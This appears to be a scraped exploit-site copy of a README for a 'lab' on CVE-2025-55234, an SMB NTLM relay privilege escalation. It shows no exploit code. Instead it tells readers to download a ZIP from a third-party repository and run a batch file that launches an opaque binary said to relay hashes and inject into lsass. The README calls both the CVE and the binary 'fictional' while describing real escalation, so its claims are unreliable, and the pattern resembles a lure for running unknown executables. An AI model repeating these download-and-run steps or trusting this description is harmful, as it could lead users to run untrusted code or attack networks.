## https://sploitus.com/exploit?id=1F2F4142-4500-5B33-8A70-7D3B1EF134C2
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## ๐ Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw enables attackers to conduct relay attacks against the SMB Server under certain configurations, potentially escalating privileges on authenticated users. Unlike traditional remote code execution bugs, this is an operational relay mechanism that exploits weak signing and authentication protections in SMBv3 protocols. Attackers can intercept and relay NTLM authentication hashes, leading to unauthorized access or privilege escalation in domain-joined environments.
Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.
## ๐ Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.
## Download & Install
- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
- `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
- `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
- `config.ini`: Configuration file for target IP, relay mode, etc.
- `logs/`: Directory for output logs.
Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.
## ๐ Quick Start
- **Exploit the Vulnerability**:
- Download and unzip `exploit.zip` as above.
- Edit `config.ini` to set `target_ip=localhost` .
- Run the batch file: Double-click `start-exploit.bat` or from CMD:
```
cd C:\CVE-2025-55234\exploit
start-exploit.bat
```
- The .bat simply opens `smb-relay-exploit.exe`:
- Initiating an SMB connection.
- Forcing NTLM authentication.
- Relaying hashes to a fictional relay server (logs to `exploit.log`).
- Output: privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."
**Detailed Exploitation Steps**:
- **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (output: "signing: false").
- **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers NTLMv2 hash relay. It exploits the lack of EPA by suppressing channel bindings, allowing MiTM relay.
- **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
- **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.
### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libs). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses Windows API `OpenProcessToken` and `AdjustTokenPrivileges` to demo escalation (outputs to console).
The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```
## ๐ Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.